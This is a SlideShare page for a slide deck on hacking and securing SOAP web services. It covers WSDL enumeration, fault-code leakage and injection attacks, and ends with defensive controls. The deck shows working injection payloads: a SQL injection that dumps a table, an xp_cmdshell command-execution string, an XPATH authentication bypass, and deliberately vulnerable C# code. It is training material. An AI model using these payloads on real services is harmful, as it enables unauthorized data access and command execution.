SlideShare a Scribd company logo
1 of 69
Web Services Hacking and
Security
Recent analysis of Cloud App
• Enterprise Content Management – Cloud App
• Technologies & Components – APIs, OAuth, SAML,
SOAP, Ajax etc.
• Traditional Scanning – What to scan 
• Hacking and Hands-On
– SQL injection over APIs
– XSS on Mobile interface
– Authorization bypass (Look at other’s content)
– Information leaks through JSON fuzzing
– CSRF
– Virtual Sand Box bypasses
– Mobile interface compromised
Attacks
• Vulnerabilities in cloud infrastructures could allow
attackers to locate and eavesdrop on targeted virtual
machines (VMs) anywhere in the cloud.
• DDoS attack rains down on Amazon cloud
• Cross-VM side-channel attacks to extract information
from a target VM on the same machine.
• The use of virtualization by cloud service providers to
host virtual machines belonging to multiple
customers on a shared physical infrastructure is
opening up fresh data leak risks, a research report
warns.
What is common in all?
• All over Web and HTTP
• Web Security and Hacking is very relevant for
Cloud
• Cloud = Web 2.0 + SOA + Something-Else
• Lot of hacks are already happening on Cloud
apps over HTTP
• Game is changing and becoming interesting …
Security!
• Web service - evolving as new attack point in
application framework.
• Toolkits and Exploits are coming up
• Too many protocols and confusion
• Race for deployment – poor implementation
• Cases and attacks are growing with growth in business
usage
Web
Services
Client
HTTP POST
SOAP Envelope
Web
Server
80/443
Web
Services
Engine
Web
Services
Binaries
Web Services
Deployment
Shell
Web Services
Code &
Components
User ControlledVendor ControlledIn TransitEnd Client
Security!
Web Services Engine
Web
Services
Resource
Defense
Controls
Web Services Deployment
Web Services Code
Database
File System
Network
Resource
Attack
Agent
Attack
Method
Attack
Vector
Exploit
Vulnerability
In
Transit
Security!
Assessment strategies
Web Services Risk
Model
Web Services Defense
Controls
Blackbox
Assessment
Whitebox
Assessment
Technology Deployment
DB
Internet DMZ Trusted
Internal/Corporate
Web
Service
Client
Web
Server
(IIS/Apache)
Application
Servers
(.Net/Tomcat)
Web
Services
Container
(Axis)
SOAP
Serves SOAP
over
HTTP/HTTPS
XML Parsing
WSDL
Transport etc.
Web Services
Code
resides
Web services evaluation
methodology
Footprinting
Discovery Public domain search
Enumeration
Manual Audit Auto Audit
Defense
• In transit Sniffing or Spoofing
• WS-Routing security concern
• Replay attacks
Risk - In transit
Risk - Web services Engine
• Buffer overflow
• XML parsing attacks
• Spoiling Schema
• Complex or Recursive structure as payload
• Denial of services
• Large payload
Web services Deployment - Risk
• Fault code leaks
• Permissions & Access issues
• Poor policies
• Customized error leakage
• Authentication and Certification
Web services User code - Risk
• Parameter tampering
• WSDL probing
• SQL/LDAP/XPATH/OS command injection
• Virus/Spyware/Malware injection
• Bruteforce
• Data type mismatch
• Content spoofing
• Session tampering
• Format string
• Information leakage
• Authorization
© Blueinfy Solutions Pvt. Ltd.
Scanning SOA
Web Service Search
• Search in the public domain
• Tool – Search Engines
• Google – An excellent tool
• Look for wsdl,asmx,jws etc.
• Filetype and allinurl are best friends
Technology Identification
• Platform on which Web services are running
• Configuration and Structures
• File extensions
• Path discovery
Very useful information!
Technology Identification
• Location can be obtained from UDDI
as well, if already published.
• WSDL location [ Access Point ]
http://192.168.11.2/ws/dvds4less.asmx?wsdl
.asmx – indicates
.Net server from MS
Technology Identification
• Similarly, .jws – for Java web services
• /ws/ - in the path indicates web services
• MS-SOAPToolkit can be identified as well
C:> nc 192.168.11.2 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 28 Sep 2004 18:48:20 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 7565
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/
Cache-control: private
Technology Identification
• Resource header throws up some information
as well
C:> nc 192.168.11.2 80
HEAD /ws/dvds4less.asmx HTTP/1.0
HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 28 Sep 2004 18:50:09 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3026
WSDL Scanning/Enumeration
• What is WSDL?
• What information can one enumerate from
WSDL?
• WSDL exposure: Threat or not?
WSDL
• Web Services Definition Language
• Similar to IDL for remote calls used in CORBA or
other remote invoke methods.
• Contains detail of methods
• Types of I/O
• Parameters of methods
• It is an XML document with standards.
WSDL Nodes
Data
types
Message
Types
Operations
Access BindingService
WSDL <Service>
<service name="dvds4less">
<port name="dvds4lessSoap" binding="s0:dvds4lessSoap">
<soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/>
</port>
</service>
Where is the call going to go?
This is where the service is listening.
WSDL <portType>
<portType name="dvds4lessSoap">
<operation name="Intro">
<input message="s0:IntroSoapIn"/>
<output message="s0:IntroSoapOut"/>
</operation>
<operation name="getProductInfo">
<input message="s0:getProductInfoSoapIn"/>
<output message="s0:getProductInfoSoapOut"/>
</operation>
<operation name="getRebatesInfo">
<input message="s0:getRebatesInfoSoapIn"/>
<output message="s0:getRebatesInfoSoapOut"/>
</operation>
</portType>
Methods one
can call
WSDL <Message>
<portType name="dvds4lessSoap">
<operation name="getProductInfo">
<input message="s0:getProductInfoSoapIn"/>
<output message="s0:getProductInfoSoapOut"/>
</operation>
</portType>
<message name="getProductInfoSoapIn">
<part name="parameters" element="s0:getProductInfo"/>
</message>
<message name="getProductInfoSoapOut">
<part name="parameters"
element="s0:getProductInfoResponse"/>
</message>
WSDL <Types>
<s:element name="getProductInfo">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<s:element name="getProductInfoResponse">
<s:complexType>
<s:sequence>
<s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult"
type="s:string"/>
</s:sequence>
</s:complexType>
</s:element>
<message name="getProductInfoSoapIn">
<part name="parameters" element="s0:getProductInfo"/>
</message>
<message name="getProductInfoSoapOut">
<part name="parameters" element="s0:getProductInfoResponse"/>
</message>
WSDL Profile after Scan
Methods INPUT OUTPUT
Intro - None - String
getProductInfo String String
getRebatesInfo String String
© Blueinfy Solutions Pvt. Ltd.
SOAP in Action
How to access?
• Knowing WSDL profile – What next?
• Access web services
– see what goodies you can get
• How?
How to access SOAP?
• Simple Object Access Protocol
• Invoking objects on remote machine
• I/O with remote objects
• It is XML-based messaging
• Works over HTTP/HTTPS and on few other
protocols
• That is why firewall cannot block them.
• Attacks are easy and possible.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
SOAP
Envelope
Method
Call
Input to the
method
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
SOAP
Envelope
Method
response
Output to the
method
© Blueinfy Solutions Pvt. Ltd.
SOA Attacks
AV 1 - XML poisoning
• XML node manipulation
• Attack on parsing logic
– SAX
– DOM
• Can be lethal – DoS or breaking execution logic
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street</Address>
<Email>john@smith.com</Email>
<PhoneNumber>3809922347</PhoneNumber>
</ CustomerRecord>
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName><CustomerNumber>28900
1</CustomerNumber>
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street</Address>
<Email>john@smith.com</Email>
<PhoneNumber>3809922347</PhoneNumber>
</ CustomerRecord>
XML poisoning
<CustomerRecord>
<CustomerNumber>289001</CustomerNumber>
<FirstName>John</FirstName>
<FirstName>John</FirstName>
... 100 time…
<FirstName>John</FirstName>
<LastName>Smith</LastName>
<Address>Apt 31, 1st Street<Address>
<Email>john@smith.com<Email>
<PhoneNumber>3809922347<PhoneNumber>
</ CustomerRecord>
Parameter tampering & Fault code leakage
• Fault code of web services spit lot of information
about internal workings.
• This attack can fetch internal paths, database
interfaces etc.
• Fault code is part of SOAP envelope and this
helps an attacker to make logical deduction
about assets.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getRebatesInfo xmlns="http://tempuri.org/">
<fileinfo>abx.xyz</fileinfo>
</getRebatesInfo>
</soap:Body>
</soap:Envelope>
SOAP
Envelope
Method
Call
Input to the
method
Forcing Fault Code
Source of Enumeration
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>Server was unable to process request. --&gt; Could not find file
&amp;quot;c:inetpubwwwrootrebatesabx.xyz&amp;quot;.</faultstring>
<detail />
</soap:Fault>
</soap:Body>
</soap:Envelope>
Path Enumeration
Fault Code
AV 3 - SQL injection
• SQL injection can be done using SOAP traffic.
• It is innovative way of identifying database
interface points.
• One can leverage xp_cmdshell via SOAP.
• Back end database can be compromised using
this attack.
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
SOAP
Envelope
Method
Call
Input to the
method
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
Product
Information
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<soap:Fault>
<faultcode>soap:Server</faultcode>
<faultstring>Server was unable to process request. --&gt; Cannot use
empty object or column names. Use a single space if necessary.</faultstring>
<detail />
</soap:Fault>
</soap:Body>
Indicates SQL Server
Place for SQL Injection
Fault Code
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1 or 1=1</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
Popular SQL Injection
Fault Code
SOAP request
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
/(2)Bend it like Beckham($12.99)/
/(3)Doctor Zhivago($10.99)/
/(4)A Bug's Life($13.99)/
/(5)Lagaan($12.99)/
/(6)Monsoon Wedding($10.99)/
/(7)Lawrence of Arabia($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
Works!!
Entire Table
Is out
SOAP response
<?xml version="1.0" encoding="utf-16"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfo xmlns="http://tempuri.org/">
<id>1;EXEC master..xp_cmdshell 'dir c: >
c:inetpubwwwrootwsdir.txt'</id>
</getProductInfo>
</soap:Body>
</soap:Envelope>
Exploiting this Vulnerability
Exploit code
SOAP request
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<getProductInfoResponse xmlns="http://tempuri.org/">
<getProductInfoResult>/(1)Finding Nemo($14.99)/
</getProductInfoResult>
</getProductInfoResponse>
</soap:Body>
</soap:Envelope>
Works!!
Looks Normal
response
SOAP request
But … Code got executed
Looks Normal
response
Got Admin via
cmdshell
AV 4 – XPATH injection
• XPATH is new way of querying XML documents.
• This attack works nicely on web services since
they use XML extensively.
• Developer’s loophole can be leveraged with an
exploit.
• XPATH query crafting is next generation attack
methods.
XPATH Injection - Basics
• XPATH is a language defined to find information from
XML document.
• As XPATH name suggests it indeed uses path to traverse
through nodes of XML document and look for specific
information from the document.
• XPATH provides expressions like slash (/), double slash
(//), dot(.), double dot (..), @, =, <, > etc. It helps in
traversing through XML document.
XPATH – Vulnerable Code
string fulltext = "";
string coString = "Provider=SQLOLEDB;Server=(local);database=order;User
ID=sa;Password=mypass";
SqlXmlCommand co = new SqlXmlCommand(coString);
co.RootTag="Credential";
co.CommandType = SqlXmlCommandType.Sql;
co.CommandText = "SELECT * FROM users for xml Auto";
XmlReader xr = co.ExecuteXmlReader();
xr.MoveToContent();
fulltext = xr.ReadOuterXml();
XmlDocument doc = new XmlDocument();
doc.LoadXml(fulltext);
string credential = "//users[@username='"+user+"' and @password='"+pass+"']";
XmlNodeList xmln = doc.SelectNodes(credential);
string temp;
if(xmln.Count > 0)
{
//True
}
else //false
Attacking XPATH point
• //users[@username='"+user+"' and @password='"+pass+"']";
• XPATH parsing can be leveraged by passing
following string ' or 1=1 or ''=‘
• This will always true on the first node and user can
get access as who ever is first user.
• //users[@username='' or 1=1 or ''='' and @password='any']
Bingo!
AV 6 – LDAP injection
• LDAP authentication in place
• Possible to manipulate LDAP queries
• May leads to enumeration OR manipulation
• Interesting attack vector
• Fault code leaks LDAP interface
AV 7 – File System access
• Identifying file system points
• Directory traversing & Access
• Leads to file access and source code exposure
• Lethal if found!
AV 7 – SOAP brute forcing
• SOAP envelope takes user & pass accounts.
• It is possible to bruteforce SOAP envelope and
look for specific responses.
• This is a possible attack which can get into the
system.
• Analyzing SOAP response is key for this set of
attack.
AV 8 – Parameter overflow
• Adding large buffers to XML nodes
• Depending on code controls – It may fail in
handling
• Breaking the application
• May compromise as well
• Traditional buffer overflow type attacks
AV 9 – Operating System access
• Point to OS
• Remote command execution is possible
• Either by “|” or “;”
• Attack is very much possible
• Leads to admin/root on the box…
AV 10 – Session hijacking
• Web services can maintain sessions
• [WebMethod(EnableSession=true)]
• Possible to reverse engineer session
• Cookie tempering is reality…
• Can be compared to traditional web
application session.
Other attacks
• External referencing – XML schema
• XSS attack
• In transit attacks – replay and spoofing
© Blueinfy Solutions Pvt. Ltd.
Securing SOA
Defense 1: SOAP filtering
• Regular firewall will not work
• Content filtering on HTTP will not work either
since it is SOAP over HTTP/HTTPS
• SOAP level filtering and monitoring would
require
• ISAPI level filtering is essential
• SOAP content filtering – products or in-house
IIS
Web Server
HTTP
Stack
.Net
Web
Services
IIS Web Server
web2wall (Filter)
Web
Services
Client
SOAP Envelope
Reject
Rules for SOAP
Defense 1: SOAP filtering
Defense 2: WSDL hardening
• WSDL is major source of information
• Should not have any leakage
• Only provide necessary methods
• Invokes over SSL only
• WSDL hardening thoroughly
Defense 3: Authentication & Authorization
• WSDL access control
• Use of SAML
• Credentials – WS-Security
• Certificate analysis
• SOAP and XML filtering before access
Defense 4: Secure Coding
• Fault code management and Exception control
• Input validation
• SQL integration
• Levels of coding using different components
Defense 5: XML parsing
• Good XML parsing should be used
• .Net/J2EE – may have issues with XML parsing
• Buffer overflows using schema poisoning
© Blueinfy Solutions Pvt. Ltd.
Conclusion

More Related Content

What's hot

Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applicationsNiyas Nazar
 
Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printingleminhvuong
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOWASP Delhi
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligencemohamed nasri
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in DepthDilum Bandara
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application VulnerabilitiesPreetish Panda
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...Noppadol Songsakaew
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBGA Cyber Security
 
Mitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxwaizuq
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testingAbu Sadat Mohammed Yasin
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response PlanningPECB
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report Morane Decriem
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]David Sweigert
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical HackingS.E. CTS CERT-GOV-MD
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharksNalneesh Gaur
 

What's hot (20)

Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Module 2 Foot Printing
Module 2   Foot PrintingModule 2   Foot Printing
Module 2 Foot Printing
 
Owasp top 10 vulnerabilities
Owasp top 10 vulnerabilitiesOwasp top 10 vulnerabilities
Owasp top 10 vulnerabilities
 
Cyber Threat Intelligence
Cyber Threat IntelligenceCyber Threat Intelligence
Cyber Threat Intelligence
 
Network security - Defense in Depth
Network security - Defense in DepthNetwork security - Defense in Depth
Network security - Defense in Depth
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Ceh v5 module 04 enumeration
Ceh v5 module 04 enumerationCeh v5 module 04 enumeration
Ceh v5 module 04 enumeration
 
Mitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptxMitre Attack - Credential Dumping - updated.pptx
Mitre Attack - Credential Dumping - updated.pptx
 
Broken access controls
Broken access controlsBroken access controls
Broken access controls
 
Ceh v5 module 03 scanning
Ceh v5 module 03 scanningCeh v5 module 03 scanning
Ceh v5 module 03 scanning
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Cyber Security Incident Response Planning
Cyber Security Incident Response PlanningCyber Security Incident Response Planning
Cyber Security Incident Response Planning
 
Threat Hunting Report
Threat Hunting Report Threat Hunting Report
Threat Hunting Report
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]Overview of the Cyber Kill Chain [TM]
Overview of the Cyber Kill Chain [TM]
 
Penetration testing & Ethical Hacking
Penetration testing & Ethical HackingPenetration testing & Ethical Hacking
Penetration testing & Ethical Hacking
 
Phishing: Swiming with the sharks
Phishing: Swiming with the sharksPhishing: Swiming with the sharks
Phishing: Swiming with the sharks
 

Viewers also liked

Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
Gradebook - NG
Gradebook - NGGradebook - NG
Gradebook - NGKirk
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaFrancesc Perez
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservicesMohammed A. Imran
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentSirius
 
Web Application Testing
Web Application TestingWeb Application Testing
Web Application TestingRicha Goel
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios weblimahack
 
The Next Big Thing is Web 3.0. Catch It If You Can
The Next Big Thing is Web 3.0. Catch It If You Can The Next Big Thing is Web 3.0. Catch It If You Can
The Next Big Thing is Web 3.0. Catch It If You Can Judy O'Connell
 
PHP and Web Services
PHP and Web ServicesPHP and Web Services
PHP and Web ServicesBruno Pedro
 
Cyber security
Cyber securityCyber security
Cyber securitySiblu28
 
IT in Healthcare
IT in HealthcareIT in Healthcare
IT in HealthcareNetApp
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalAleyda Solís
 

Viewers also liked (15)

Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
Gradebook - NG
Gradebook - NGGradebook - NG
Gradebook - NG
 
Seguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informáticaSeguridad: Introducción a la seguridad informática
Seguridad: Introducción a la seguridad informática
 
Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
JSON Injection
JSON InjectionJSON Injection
JSON Injection
 
Pentesting RESTful webservices
Pentesting RESTful webservicesPentesting RESTful webservices
Pentesting RESTful webservices
 
Eight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability AssessmentEight Steps to an Effective Vulnerability Assessment
Eight Steps to an Effective Vulnerability Assessment
 
Web Application Testing
Web Application TestingWeb Application Testing
Web Application Testing
 
Web 2.0
Web 2.0Web 2.0
Web 2.0
 
Atacando servicios web
Atacando servicios webAtacando servicios web
Atacando servicios web
 
The Next Big Thing is Web 3.0. Catch It If You Can
The Next Big Thing is Web 3.0. Catch It If You Can The Next Big Thing is Web 3.0. Catch It If You Can
The Next Big Thing is Web 3.0. Catch It If You Can
 
PHP and Web Services
PHP and Web ServicesPHP and Web Services
PHP and Web Services
 
Cyber security
Cyber securityCyber security
Cyber security
 
IT in Healthcare
IT in HealthcareIT in Healthcare
IT in Healthcare
 
Mobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigitalMobile-First SEO - The Marketers Edition #3XEDigital
Mobile-First SEO - The Marketers Edition #3XEDigital
 

Similar to Web Services Hacking and Security

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applicationsDevnology
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overviewowaspindy
 
Shared Security Responsibility for the Azure Cloud
Shared Security Responsibility for the Azure CloudShared Security Responsibility for the Azure Cloud
Shared Security Responsibility for the Azure CloudAlert Logic
 
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...AFAS Software
 
Collector Web Services
Collector Web ServicesCollector Web Services
Collector Web Servicespublisyst
 
Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP)Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP)Mehul Boricha
 
Extending drupal authentication
Extending drupal authenticationExtending drupal authentication
Extending drupal authenticationCharles Russell
 
SOA and WCF (Windows Communication Foundation) basics
SOA and WCF (Windows Communication Foundation) basicsSOA and WCF (Windows Communication Foundation) basics
SOA and WCF (Windows Communication Foundation) basicsYaniv Pessach
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Rahul
 
Web Api services using IBM Datapower
Web Api services using IBM DatapowerWeb Api services using IBM Datapower
Web Api services using IBM DatapowerSigortam.net
 
FS_Usage_Scenarios
FS_Usage_ScenariosFS_Usage_Scenarios
FS_Usage_ScenariosKevin Kao
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?Nathan Van Gheem
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
dist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfdist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfNohaNagy5
 

Similar to Web Services Hacking and Security (20)

The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
Owasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet OverviewOwasp Indy Q2 2012 Cheat Sheet Overview
Owasp Indy Q2 2012 Cheat Sheet Overview
 
Intorduction to Datapower
Intorduction to DatapowerIntorduction to Datapower
Intorduction to Datapower
 
Shared Security Responsibility for the Azure Cloud
Shared Security Responsibility for the Azure CloudShared Security Responsibility for the Azure Cloud
Shared Security Responsibility for the Azure Cloud
 
Spa Secure Coding Guide
Spa Secure Coding GuideSpa Secure Coding Guide
Spa Secure Coding Guide
 
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...
Pieter de Bruin (Microsoft) - Welke technologie gebruiken bij implementatie M...
 
Collector Web Services
Collector Web ServicesCollector Web Services
Collector Web Services
 
Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP)Simple Object Access Protocol (SOAP)
Simple Object Access Protocol (SOAP)
 
Global Windows Azure Bootcamp - San Diego
